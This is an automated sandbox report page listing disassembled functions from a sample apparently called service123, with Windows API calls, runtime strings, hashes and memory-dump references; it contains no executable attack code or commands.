Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: d0734583c3720b39bf05ce9ee647d02e393ca10793a6345552d519bd95190970
Instruction ID: 826e12a194d64fb5300831e70af4413e73db241bc54e78ae4878a3e1bac6bd5d
Opcode Fuzzy Hash: d0734583c3720b39bf05ce9ee647d02e393ca10793a6345552d519bd95190970
Instruction Fuzzy Hash: 4D516F707097498FCB00DFA9C48465ABBF5FB9A308F15452DEC4687710E731E846CB96

Function 008F1940 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 008F196F
vfprintf.MSVCRT ref: 008F198F
abort.MSVCRT ref: 008F1994
VirtualQuery.KERNEL32 ref: 008F1A2B

Strings

Address %p has no image-section, xrefs: 008F1AEB
VirtualProtect failed with code 0x%x, xrefs: 008F1AA6
Mingw-w64 runtime failure:, xrefs: 008F1968
VirtualQuery failed for %d bytes at address %p, xrefs: 008F1AD7

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 9eae2dd7139f3d0d7ce688d38d6728347605b92213edad10c070a4485baae1b6
Instruction ID: f399949f9388f76256b4ad808155fa7be9652737c7d857f7ed79c74be49daa1e
Opcode Fuzzy Hash: 9eae2dd7139f3d0d7ce688d38d6728347605b92213edad10c070a4485baae1b6
Instruction Fuzzy Hash: C65156B1504708DFCB10EF79D889A6ABBE1FF84354F45891DEA88CB211E735E845CB92

Function 6C29A690 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6C29A6BF
vfprintf.MSVCRT ref: 6C29A6DF
abort.MSVCRT ref: 6C29A6E4
VirtualQuery.KERNEL32 ref: 6C29A77B

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 6C29A827
VirtualProtect failed with code 0x%x, xrefs: 6C29A7F6
Address %p has no image-section, xrefs: 6C29A83B
Mingw-w64 runtime failure:, xrefs: 6C29A6B8

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 7599af56b496d34786c0482f283d6863e69ca97a784a863c8b42005e5bf59590
Instruction ID: 0c91e8a38881308cec90f05f8d561b77973c68bf0eea3cf55cc6d05fda576b7f
Opcode Fuzzy Hash: 7599af56b496d34786c0482f283d6863e69ca97a784a863c8b42005e5bf59590
Instruction Fuzzy Hash: 01517BB1908305DFC700EF2AC48568ABBF4FF85358F51891DE8889B750E734E849CBA2

Function 6C29E0A0 Relevance: 16.6, APIs: 11, Instructions: 98COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 42b1c6d566f46988039251e392381da7741ec096beb4ec00e0c76739455e23e0
Instruction ID: eaad7c5bb9acc4a2ba695b12178abd34ad64e880e1d39bbee25d39138951a87e
Opcode Fuzzy Hash: 42b1c6d566f46988039251e392381da7741ec096beb4ec00e0c76739455e23e0
Instruction Fuzzy Hash: E72126323452198BC704CE5DD881A9673B6FBC632872881BEE8488BB25D637A846C790

Function 6C29E570 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction ID: 2977c5de3a28a9dc5a2050f60fa89d19549ec3f10cc86573f92b955f1a8888e4
Opcode Fuzzy Hash: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction Fuzzy Hash: B6419F7060830B9BD710DF2AC04066AB7E5BF81319F544A1AFCA486A95E734D94ACBD2

Function 6C29E59B Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction ID: f3670367f32746671a56c3cae83ad1da37d85ba64407716a70bc9ec33f278393
Opcode Fuzzy Hash: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction Fuzzy Hash: 5421A47050530B9BD710DE2AC0906AAB7E5BF81319F644E19FCA497A89E334D94ACBD3

Function 6C29E714 Relevance: 15.0, APIs: 10, Instructions: 35COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction ID: cffff34a76f222a60e9c31433249472eeedfd86eedf386f0aac9e2d0beb98db7
Opcode Fuzzy Hash: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction Fuzzy Hash: 01E0867058821ECBC610DE2AC061595B7E9BF46348B404807ECD597D15D730D94FCEC6

Function 6C2A9249 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C2A9260
GetProcAddress.KERNEL32 ref: 6C2A927A
LoadLibraryW.KERNEL32 ref: 6C2A929F
GetProcAddress.KERNEL32 ref: 6C2A92B3

Strings

advapi32.dll, xrefs: 6C2A9298
SystemFunction036, xrefs: 6C2A92A8
rand_s, xrefs: 6C2A926F
msvcrt.dll, xrefs: 6C2A9255

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 379dec2c6e8ba2ff31c204f81db8814f72aedf1caffbd5f5dce26526c3204207
Instruction ID: 24e257b13d16d2882a0c0ef6c4dc1192b34dd2ce741d95d26c525292d040c70a
Opcode Fuzzy Hash: 379dec2c6e8ba2ff31c204f81db8814f72aedf1caffbd5f5dce26526c3204207
Instruction Fuzzy Hash: EBF04FB19543148FCF10BF79854624ABBB4BB16320F01092CD8C59B200D634E424CF6B

Function 6C32F670 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C30D7DE), ref: 6C32F70D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C30D7DE), ref: 6C32F738
memmove.MSVCRT ref: 6C32F787
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C30D7DE), ref: 6C32F7BD
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C30D7DE), ref: 6C32F808

Strings

basic_string::_M_replace, xrefs: 6C32F966

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 5517558784c24b18f7876a65008fea4cf244e0462c2919874bcd04f8427a43a3
Instruction ID: 4aaa3d46f728f15e7030adfec0a893f160f367b3e3410c656cb28209ac3790ef
Opcode Fuzzy Hash: 5517558784c24b18f7876a65008fea4cf244e0462c2919874bcd04f8427a43a3
Instruction Fuzzy Hash: FF812774A093619FCB01DF2CC19051ABBE5AFCA748F24891EE4D587715D336D849CF62

Function 6C29FEE0 Relevance: 13.7, APIs: 9, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2A00D2
WaitForSingleObject.KERNEL32 ref: 6C2A0117

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 91de00ff894be45c27c1068dd0814486c7e1209796d077f7e2077655ced9cf42
Instruction ID: 9145912b8b31a1d085019d66b00136fcd8fa9c3979baa1e6e8160aef6f6239a5
Opcode Fuzzy Hash: 91de00ff894be45c27c1068dd0814486c7e1209796d077f7e2077655ced9cf42
Instruction Fuzzy Hash: AF615A7070934A8BDB10DFAAC54479777B8AB56309F108519FC5A87B80DB70D84A8B62

Function 6C29E760 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction ID: a1f7e61b7b4663e44eb8468666da0777c6e32e821b3fe5b743c650b065021191
Opcode Fuzzy Hash: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction Fuzzy Hash: C001CE70A1821ECFC700DA1AC480ADAB7E5BB89314F004D2AFC858BA15D230E8CAC7C3

Function 008F2BF0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 008F2CC1

Strings

o, xrefs: 008F30A8
0, xrefs: 008F313E

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction ID: a64f2ed86249c91b921692784e15f8aeef8be2c21115dc8987d2c6900d9f0edb
Opcode Fuzzy Hash: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction Fuzzy Hash: E9F13C71A0460D8FCB15CF68C4806ADBBF2FF89360F298229DA55EB395D734E945CB90

Function 6C2A32C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C2A3391

Strings

0, xrefs: 6C2A380E
o, xrefs: 6C2A3778

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction ID: 688fcbd427a30b130a5a9b9c917f90c70f8853dd0318c7c767590ab4a369dc9c
Opcode Fuzzy Hash: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction Fuzzy Hash: 6DF16075A082098FCB05CFA9C48069DFBF2BF89364F198269EC54AB751D734E946CB90

Function 008F14E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 008F14F0
LoadLibraryA.KERNEL32 ref: 008F1506
GetProcAddress.KERNEL32 ref: 008F1525
GetProcAddress.KERNEL32 ref: 008F1537

Strings

__register_frame_info, xrefs: 008F151A
__deregister_frame_info, xrefs: 008F152C
libgcc_s_dw2-1.dll, xrefs: 008F14E9, 008F14FF

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 38ca29fc88f508bbc2d4ad3265487e79f2de0be160dcf2ea83758c6b6f20e583
Instruction ID: c3f844c31abe392273e7d0609fec0ed62ea7b0fcab141d5a11dc771ac27cca2c
Opcode Fuzzy Hash: 38ca29fc88f508bbc2d4ad3265487e79f2de0be160dcf2ea83758c6b6f20e583
Instruction Fuzzy Hash: 42011AB1809708DBC7007FB9A94963EBEE4FB84765F014529D789C7210EB758858CBA7

Function 6C2913E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6C2913F0
LoadLibraryA.KERNEL32 ref: 6C291406
GetProcAddress.KERNEL32 ref: 6C291425
GetProcAddress.KERNEL32 ref: 6C291437

Strings

__register_frame_info, xrefs: 6C29141A
libgcc_s_dw2-1.dll, xrefs: 6C2913E9, 6C2913FF
__deregister_frame_info, xrefs: 6C29142C

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 7077a009fbcbeb7670569df56d99b249d438b3ae6708b3c7b9615acd6b801edc
Instruction ID: e27adaa0192a29b215cd8372983a3b295750ab32431ea622eda94fa9e33ea10f
Opcode Fuzzy Hash: 7077a009fbcbeb7670569df56d99b249d438b3ae6708b3c7b9615acd6b801edc
Instruction Fuzzy Hash: 450171B6A093089BCB00BF7B950725EBFB8EA5A251F01542DEEC94BA14D730C444CFA7

Function 6C2B7170 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 237stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6C2B71C1
strlen.MSVCRT ref: 6C2B71DB
strlen.MSVCRT ref: 6C2B722B
strlen.MSVCRT ref: 6C2B7288
strlen.MSVCRT ref: 6C2B72DC

Strings

basic_string::append, xrefs: 6C2B747A, 6C2B7486, 6C2B7492, 6C2B749E
*, xrefs: 6C2B7410

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
